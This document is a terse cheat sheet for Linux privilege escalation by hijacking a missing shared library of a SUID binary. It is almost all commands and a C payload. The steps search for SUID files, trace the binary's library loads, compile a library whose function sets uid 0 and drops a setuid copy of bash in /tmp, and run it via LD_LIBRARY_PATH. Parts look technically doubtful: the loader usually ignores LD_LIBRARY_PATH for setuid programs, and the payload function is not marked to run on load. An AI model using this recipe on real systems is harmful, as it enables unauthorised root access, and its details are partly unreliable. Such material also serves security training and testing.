Escalation with shared libraries

  • Escalation


Find files with a suid or sgid

find / -perm /6000 2>/dev/null

 

Example:

ls -l /usr/local/bin/strange
-rwsr-xr-x 1 root root 8432 Nov 18 2020 /usr/local/bin/strange

 

Execution

/usr/local/bin/strange
/usr/local/bin/strange: error while loading shared libraries: libstrange.so: cannot open shared object file: No such file or directory

 

Debug

ldd /usr/local/bin/strange
strings /usr/local/bin/strange
strace /usr/local/bin/strange
strace /usr/local/bin/strange 2>&1 | grep -i -E "open|access|no such file"

 

Payload

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void payload() {
        setuid(0);
        setgid(0);
        system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

 

Compilation

gcc -shared -fPIC -o /home/john/lib/libstrange.so /home/john/lib/libstrange.c
export LD_LIBRARY_PATH=/home/john/lib:$LD_LIBRARY_PATH

 

Exploitation

/usr/local/bin/strange

 

Escalation

/tmp/bash